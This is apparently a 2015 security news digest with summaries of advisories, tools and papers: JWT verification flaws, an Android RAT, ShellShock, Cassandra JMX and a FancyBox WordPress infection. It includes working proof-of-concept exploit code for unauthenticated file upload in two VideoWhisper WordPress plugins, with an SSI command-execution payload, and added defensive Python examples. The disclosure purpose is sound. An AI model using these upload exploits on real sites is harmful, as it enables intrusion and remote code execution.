Channel: BOT24

Encryption Companies Throwing Shade Keeps Everyone In the Dark

In the burgeoning market for services that keep your messages safe from hackers and the NSA, every new app wants to be seen as more secure than the last—even if they’re really not.

In the last two weeks alone, industry players both new and established in the world of secure messaging apps have made incredible claims about the security of their services compared to their competitors’. Every one of them has been picked apart by third party experts, leading some in the encryption community to wonder if the companies in question are more interested in increasing their market share than protecting their users.

more here...........http://motherboard.vice.com/read/encryption-companies-throwing-shade-keeps-everyone-in-the-dark

Exploiting the Airties Air Series PoC

The month of the RAT in Google Play

A few days ago, Lukas Stefanko from ESET discovered a new remote administration tool (RAT) for Android. Although there are some known RATs for Android, this malware had something special: it used Baidu Cloud Push notifications for sending commands to the victims. What we can confirm (not in the original blog entry) is that this RAT has been available not only in "alternative markets" but in Google Play, undetected for more than a month.

more here..........http://blog.elevenpaths.com/2015/03/the-month-of-rat-in-google-play.html

mimikatz 2.0 alpha 20150401 (oe.eo) edition release

Critical vulnerabilities in JSON Web Token libraries

tl;dr If you are using node-jsonwebtoken or pyjwt with asymmetric keys (RS256, RS384, RS512, ES256, ES384, ES512) please update to the latest version. If you are using php-jwt or jsjwt with asymmetric keys consider using other non-vulnerable libraries until they are patched or verified. See jwt.io for more information on the vulnerable libraries.

Recently, while reviewing the security of various JSON Web Token implementations, I found many libraries with critical vulnerabilities allowing attackers to bypass the verification step. The same two flaws were found across many implementations and languages, so I thought it would be helpful to write up exactly where the problems occur. I believe that a change to the standard could help prevent future vulnerabilities.

more here...........https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
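
The post above does not reproduce the flaws, but the defensive principle behind the fixes it points to is that the verifier, not the token's header, decides which algorithm (and therefore which key type) is acceptable. The following is an added example, not code from the post or from any of the libraries it names: a minimal JWT signer and two verifiers, one that trusts the header's alg (and so accepts an unsigned alg=none token) and one that pins the algorithm before doing any cryptography. It uses HS256 so that it runs with the standard library alone; the same rule applies to the asymmetric algorithms the post is about. DEMO_KEY and all function names are constructed for this example.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo key; a real deployment loads its key from configuration.
DEMO_KEY = b"constructed-demo-secret-not-for-production"


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_jwt(payload: dict, key: bytes, alg: str = "HS256") -> str:
    """Mint a token. alg='none' yields an unsigned token (empty signature);
    it exists here only to show what the flawed verifier accepts."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    if alg == "HS256":
        sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
        return signing_input + "." + b64url_encode(sig)
    if alg == "none":
        return signing_input + "."
    raise ValueError(f"unsupported alg {alg!r}")


def verify_trusting_header(token: str, key: bytes) -> dict:
    """Flawed pattern: the token's own header decides how it is verified,
    so a header claiming alg='none' switches verification off entirely."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    alg = header.get("alg")
    if alg == "none":
        return json.loads(b64url_decode(p))  # no signature is checked at all
    if alg == "HS256":
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    raise ValueError("signature verification failed")


def verify_pinned(token: str, key: bytes, expected_alg: str = "HS256") -> dict:
    """Hardened pattern: the verifier fixes the algorithm up front and rejects
    any token whose header disagrees, before touching the signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("alg") != expected_alg:
        raise ValueError(f"alg {header.get('alg')!r} not permitted")
    if expected_alg != "HS256":
        raise ValueError("this demo implements HS256 only")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("signature verification failed")
    return json.loads(b64url_decode(p))


def accepts(verifier, token: str, key: bytes) -> bool:
    """True if the verifier returns a payload for the token, False if it rejects it."""
    try:
        verifier(token, key)
        return True
    except ValueError:
        return False
```

With a real library the equivalent of verify_pinned is passing the single expected algorithm to the decode call and never deriving it from the token; the header is untrusted input like everything else in the token.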

ropc v2.0

Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17

Title: Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31 won’t fix, http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117
Description: from the site
"VideoWhisper Video Consultation is a web based video communication solution designed for online video consultations,
interactive live presentations, trainings, webinars, coaching and online collaboration with webcam support. Read more
on WordPress Video Presentation plugin home page."

Vulnerability:
wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php allows various unauthenticated remote file
uploads. Among the allowed file types is html, and only the last four characters of the file name are checked
against the list of allowed types. Because of this, .shtml passes the check (its last four characters are "html"),
which gives remote code execution if SSI is enabled. The code does no user access validation, so anyone can upload
the following files to an unsuspecting WordPress site:
.shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps
The check
if (strstr($filename,'.php')) exit;

can be bypassed by using the extension .Php (strstr is case-sensitive), and the file extension check would allow files like test.Php.shtml.
<?php
if ($_GET["room"]) $room=$_GET["room"];
if ($_POST["room"]) $room=$_POST["room"];
$filename=$_FILES['vw_file']['name'];
include_once("incsan.php");
sanV($room);
if (!$room) exit;
sanV($filename);
if (!$filename) exit;
if (strstr($filename,'.php')) exit; //do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit;
if ( strstr($filename,"/") || strstr($filename,"..") ) exit;
$destination="uploads/".$room."/";
if ($_GET["slides"]) $destination .= "slides/";
$ext=strtolower(substr($filename,-4));
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");
if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>loadstatus=1
CVEID: TBD
OSVDB: TBD
Exploit Code:
videowhis_poc.php
<?php

$uploadfile="upexp.shtml";
$ch = curl_init("http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('vw_file'=>"@$uploadfile",'name'=>'upexp.shtml','room'=>'.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>


upexp.shtml

<html>

<!--#exec cmd="/usr/bin/date > /tmp/p" -->

this is html
</html>


The executable should be located in
wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads

Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8

Title: Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/support/plugin/videowhisper-video-conference-integration
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31, won’t fix. http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=116
Description: From their site "VideoWhisper Video Conference is a modern web based multiple way video chat and real time
file sharing tool. Read more on WordPress Video Conference plugin home page."

Vulnerability:
./videowhisper-video-conference-integration/vc/vw_upload.php allows various unauthenticated remote file uploads.
Among the allowed file types is html, and only the last four characters of the file name are checked against the
list of allowed types. Because of this, .shtml passes the check (its last four characters are "html"), which gives
remote code execution if SSI is enabled. The code does no user access validation, so anyone can upload the following
files to an unsuspecting WordPress site:

.shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps

The check
if (strstr($filename,'.php')) exit;
can be bypassed by using the extension .Php (strstr is case-sensitive), and the file extension check would allow files like test.Php.shtml.

./videowhisper-video-conference-integration/vc/vw_upload.php

<?php
if ($_GET["room"]) $room=$_GET["room"];
if ($_POST["room"]) $room=$_POST["room"];

$filename=$_FILES['vw_file']['name'];
include_once("incsan.php");
sanV($room);
if (!$room) exit;
sanV($filename);
if (!$filename) exit;
if (strstr($filename,'.php')) exit; //do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit;
if ( strstr($filename,"/") || strstr($filename,"..") ) exit;
$destination="uploads/".$room."/";
if ($_GET["slides"]) $destination .= "slides/";
$ext=strtolower(substr($filename,-4));
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");
if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>loadstatus=1

CVEID: TBD
OSVDB: TBD

Exploit Code:
videowhisp_poc.php

<?php

$uploadfile="upexp.shtml";
$ch = curl_init("http://target_site/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('vw_file'=>"@$uploadfile",'name'=>'upexp.shtml','room'=>'.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

upexp.shtml

<html>

<!--#exec cmd="/usr/bin/date > /tmp/p" -->

this is html
</html>


The executable should be located in
wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads
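
Both VideoWhisper advisories above hinge on the same check: a case-sensitive strstr() for ".php" followed by a comparison of only the last four characters of the file name against a list that includes "html". The following is an added example, not code from the plugin or from the advisories, that transcribes that check into Python beside a hardened version which parses the full extension, refuses multi-extension names, compares case-insensitively, and never stores a file under the client-chosen name. ALLOWED_EXTENSIONS (the plugin's list minus the server-interpreted .htm/.html types), stored_name and the other names are constructed for this example.

```python
import posixpath
import secrets
from typing import Optional

# Allowlist of complete, lower-cased extensions. Server-interpreted types
# (.htm/.html, and by extension .shtml) are deliberately absent.
ALLOWED_EXTENSIONS = {
    "swf", "zip", "rar", "jpg", "jpeg", "png", "gif", "txt", "doc", "docx",
    "pdf", "mp3", "flv", "avi", "mpg", "ppt", "pps",
}

# The plugin's own list, transcribed from vw_upload.php for comparison.
PLUGIN_ALLOWED = [".swf", ".zip", ".rar", ".jpg", "jpeg", ".png", ".gif", ".txt",
                  ".doc", "docx", ".htm", "html", ".pdf", ".mp3", ".flv", ".avi",
                  ".mpg", ".ppt", ".pps"]


def plugin_check(filename: str) -> bool:
    """Python transcription of the vulnerable logic: a case-sensitive '.php'
    substring test, then only the last four characters compared to the list."""
    if ".php" in filename:                    # strstr() is case-sensitive
        return False
    if "/" in filename or ".." in filename:
        return False
    return filename[-4:].lower() in PLUGIN_ALLOWED


def hardened_check(filename: str) -> bool:
    """Parse the whole extension, allow exactly one, compare case-insensitively."""
    if not filename or "\x00" in filename:
        return False
    if filename != posixpath.basename(filename) or "\\" in filename:
        return False                          # any path component is rejected
    parts = filename.split(".")
    if len(parts) != 2 or not parts[0]:
        return False                          # 'x.Php.shtml', '.htaccess', 'noext' all fail
    return parts[1].lower() in ALLOWED_EXTENSIONS


def stored_name(filename: str) -> Optional[str]:
    """Never store under the client-chosen name: keep only the validated
    extension and generate the stem server-side."""
    if not hardened_check(filename):
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"
```

The single-extension rule is a deliberately conservative policy (it also refuses names like archive.tar.gz); the point is that the decision is made on the parsed extension, not on a fixed number of trailing characters. Whether the upload directory can execute anything at all is a separate web-server setting that this check does not replace.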

Interesting XML Processing in Copy/Paste in Word and Outlook

Advanced PDF Tricks (Video From TROOPERS15 Conference Included)

This repository (for now) is development home to some hand-crafted PDF files. These PDFs should serve as study material for everybody who wants to learn about this format.

more here..........https://github.com/angea/PDF101

EvilAP_Defender

The tool basically helps wireless administrators to protect their networks from Evil APs (Evil Twin and any other similar attack, including the Infernal Wireless attack). It can discover Evil APs which have the same SSIDs as the legitimate network, then alert the admin through email (SMS may be supported later on). Additionally, it can perform DoS on the discovered Evil APs to keep users from connecting to them and to give the administrator some time to react. The tool can be configured easily using wizards during a mode called learning mode. Currently, the tool has several features:
- Discover Evil APs with different BSSID
- Discover Evil APs with fake BSSID but different attributes, including channel, cipher, privacy and authentication
- Discover Evil APs with fake BSSID and all of the above attributes but different tagged parameters (currently no software-based AP supports changing tagged parameters)
- Learning mode: helps in configuring the tool (auto-config, add/remove specific AP to/from whitelist, clear whitelist, change options)
- Admin notification
- Prevention mode: attack Evil APs
- And much more

Additional info here......https://github.com/moha99sa/EvilAP_Defender

Rig Exploit Kit Changes Traffic Patterns

Paper: Optical Delusions: A Study of Malicious QR Codes in the Wild

Abstract—QR codes, a form of 2D barcode, allow easy interaction between mobile devices and websites or printed material by removing the burden of manually typing a URL or contact information. QR codes are increasingly popular and are likely to be adopted by malware authors and cyber-criminals as well. In fact, while a link can “look” suspicious, malicious and benign QR codes cannot be distinguished by simply looking at them. However, despite public discussions about increasing use of QR codes for malicious purposes, the prevalence of malicious QR codes and the kinds of threats they pose are still unclear. In this paper, we examine attacks on the Internet that rely on QR codes. Using a crawler, we performed a large-scale experiment by analyzing QR codes across 14 million unique web pages over a ten-month period. Our results show that QR code technology is already used by attackers, for example to distribute malware or to lead users to phishing sites. However, the relatively few malicious QR codes we found in our experiments suggest that, on a global scale, the frequency of these attacks is not alarmingly high and users are rarely exposed to the threats distributed via QR codes while surfing the web.

Paper: Opaque Control-Flow Integrity

Abstract—A new binary software randomization and Control-Flow Integrity (CFI) enforcement system is presented, which is the first to efficiently resist code-reuse attacks launched by informed adversaries who possess full knowledge of the in-memory code layout of victim programs. The defense mitigates a recent wave of implementation disclosure attacks, by which adversaries can exfiltrate in-memory code details in order to prepare code-reuse attacks (e.g., Return-Oriented Programming (ROP) attacks) that bypass fine-grained randomization defenses. Such implementation-aware attacks defeat traditional fine-grained randomization by undermining its assumption that the randomized locations of abusable code gadgets remain secret.
Opaque CFI (O-CFI) overcomes this weakness through a novel combination of fine-grained code-randomization and coarse-grained control-flow integrity checking. It conceals the graph of hijackable control-flow edges even from attackers who can view the complete stack, heap, and binary code of the victim process. For maximal efficiency, the integrity checks are implemented using instructions that will soon be hardware-accelerated on commodity x86-x64 processors. The approach is highly practical since it does not require a modified compiler and can protect legacy binaries without access to source code. Experiments using our fully functional prototype implementation show that O-CFI provides significant probabilistic protection against ROP attacks launched by adversaries with complete code layout knowledge, and exhibits only 4.7% mean performance overhead on current hardware (with further overhead reductions to follow on forthcoming Intel processors).

more here...........http://www.utdallas.edu/~hamlen/mohan15ndss.pdf

Exploit for CVE-2014-6271, Bash "ShellShock" Remote Code Execution

This is an exploit for the well known "ShellShock" vulnerability in BASH, specifically targeting CGI scripts. You can see this code is recycled in the MoovMisManage exploit. The interesting/fun bit about this exploit is the dynamic ELF generation I borrowed from bl4sty's Nagios exploit, as it saves me messing about with reverse shell scripts - I just upload and run a simple ELF binary on the box. For what it's worth, I had not planned on releasing this to the general public until the PTY shellcode was done, but it got out when I gave it to a few people, so no point keeping it to myself anymore.

more here.......https://github.com/XiphosResearch/exploits/tree/master/shellshock

CRIMEWARE-AS-A-SERVICE CAROUSEL

Invincea reviews thousands of security events per day from the more than one million Dell commercial endpoints running our software around the world. Invincea prevents hundreds of infections per day, from weaponized phishing documents to directed malvertising to run-of-the-mill banking botnets. The infection event information presented below seemed to be one of those common botnet infection attempts.

read more here.....http://www.invincea.com/2015/04/crimeware-as-a-service-carousel/

CARISIRT: Request for Logs

Over the past couple of weeks, we have been tracking a possible re-emergence of a threat group originating from China: CZT. The security team here at CARI.net has done extensive research on this threat and is continuing to work with leading security companies as well as government agencies to verify, track and hopefully put an end to this new threat.

Starting in mid-November, there have been batches of requests that resemble the following......http://blog.cari.net/carisirt-request-for-logs/

notepad++ website hacked (inclusive Boy George's "Karma Chameleon" Song)?

CVE-2015-0225: Apache Cassandra remote execution of arbitrary code

CVE-2015-0225: Apache Cassandra remote execution of arbitrary code

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Cassandra 1.2.0 to 1.2.19
Cassandra 2.0.0 to 2.0.13
Cassandra 2.1.0 to 2.1.3

Description:
Under its default configuration, Cassandra binds an unauthenticated
JMX/RMI interface to all network interfaces. As RMI is an API for the
transport and remote execution of serialized Java, anyone with access
to this interface can execute arbitrary code as the running user.

Mitigation:
1.2.x has reached EOL, so users of <= 1.2.x are recommended to upgrade
to a supported version of Cassandra, or manually configure encryption
and authentication of JMX
(see https://wiki.apache.org/cassandra/JmxSecurity).
2.0.x users should upgrade to 2.0.14
2.1.x users should upgrade to 2.1.4
Alternately, users of any version not wishing to upgrade can
reconfigure JMX/RMI to enable encryption and authentication according
to https://wiki.apache.org/cassandra/JmxSecurity or
http://docs.oracle.com/javase/7/docs/technotes/guides/management/agent.html

Credit:
This issue was discovered by Georgi Geshev of MWR InfoSecurity
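
The mitigation above comes down to a handful of JMX agent system properties passed to the JVM. The following is an added example, not part of the advisory or of the Cassandra project, that audits the JVM_OPTS lines of a cassandra-env.sh for those properties and reports an agent exposed without authentication or TLS. The two embedded excerpts are constructed to resemble an unauthenticated default and a hardened configuration; the property names are the standard com.sun.management.jmxremote.* ones documented at the Oracle link in the advisory, and the file paths in the hardened excerpt are placeholders.

```python
import re
from typing import Dict, List

# Constructed excerpts modelled on the JVM_OPTS lines of a cassandra-env.sh;
# neither is a real file from the project.
DEFAULT_STYLE_ENV = '''
JMX_PORT="7199"
JVM_OPTS="$JVM_OPTS -Dcom.sun.management.jmxremote.port=$JMX_PORT"
JVM_OPTS="$JVM_OPTS -Dcom.sun.management.jmxremote.ssl=false"
JVM_OPTS="$JVM_OPTS -Dcom.sun.management.jmxremote.authenticate=false"
'''

HARDENED_ENV = '''
JMX_PORT="7199"
JVM_OPTS="$JVM_OPTS -Dcom.sun.management.jmxremote.port=$JMX_PORT"
JVM_OPTS="$JVM_OPTS -Dcom.sun.management.jmxremote.ssl=true"
JVM_OPTS="$JVM_OPTS -Dcom.sun.management.jmxremote.authenticate=true"
JVM_OPTS="$JVM_OPTS -Dcom.sun.management.jmxremote.password.file=/etc/cassandra/jmxremote.password"
JVM_OPTS="$JVM_OPTS -Dcom.sun.management.jmxremote.access.file=/etc/cassandra/jmxremote.access"
'''

_PREFIX = "com.sun.management.jmxremote."
# -Dname=value inside a shell-quoted JVM_OPTS string; the value stops at
# whitespace or a quote character.
_PROP = re.compile(r"-D(com\.sun\.management\.jmxremote\.[\w.]+)=([^\s\"']+)")


def jmx_properties(env_text: str) -> Dict[str, str]:
    """Collect the JMX agent system properties set via -D, ignoring comment lines.
    A later assignment overrides an earlier one, as on the JVM command line."""
    props: Dict[str, str] = {}
    for line in env_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        for name, value in _PROP.findall(line):
            props[name] = value
    return props


def audit_jmx(env_text: str) -> List[str]:
    """Return findings for a remote JMX agent that lacks the advisory's mitigations.
    The JVM's own defaults for authenticate and ssl are true, which the lookups mirror."""
    props = jmx_properties(env_text)
    findings: List[str] = []
    if _PREFIX + "port" not in props:
        return findings  # no remote agent configured through these properties
    if props.get(_PREFIX + "authenticate", "true").lower() != "true":
        findings.append("remote JMX enabled with authenticate=false: anyone who can "
                        "reach the port can invoke MBeans as the Cassandra user")
    elif _PREFIX + "password.file" not in props:
        findings.append("authenticate=true but no password.file set: the JVM falls "
                        "back to its default jmxremote.password location")
    if props.get(_PREFIX + "ssl", "true").lower() != "true":
        findings.append("remote JMX with ssl=false: credentials and RMI traffic "
                        "travel in cleartext")
    return findings
```

Run audit_jmx over the contents of each node's cassandra-env.sh as part of configuration review; an empty list for a node that exposes a JMX port means authentication and TLS are both on. Upgrading to the fixed versions named in the advisory remains the primary fix.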

“Fancybox for WordPress Has Expired” Infection

Today I began to notice quite a massive and very unusual attack that leverages vulnerabilities in older versions of the FancyBox for WordPress plugin.


As you might know, versions 3.0.2 and older of this plugin allowed anyone to craft special POST requests to /wp-admin/admin-post.php or /wp-admin/admin-ajax.php and change the values of specific plugin options in the WordPress database. The plugin uses the modified options to build its own JavaScript code. As a result, the malicious content gets injected into generated WordPress pages.

A typical malicious injection looks like this http://blog.unmaskparasites.com/2015/04/01/fancybox-for-wordpress-has-expired-infection/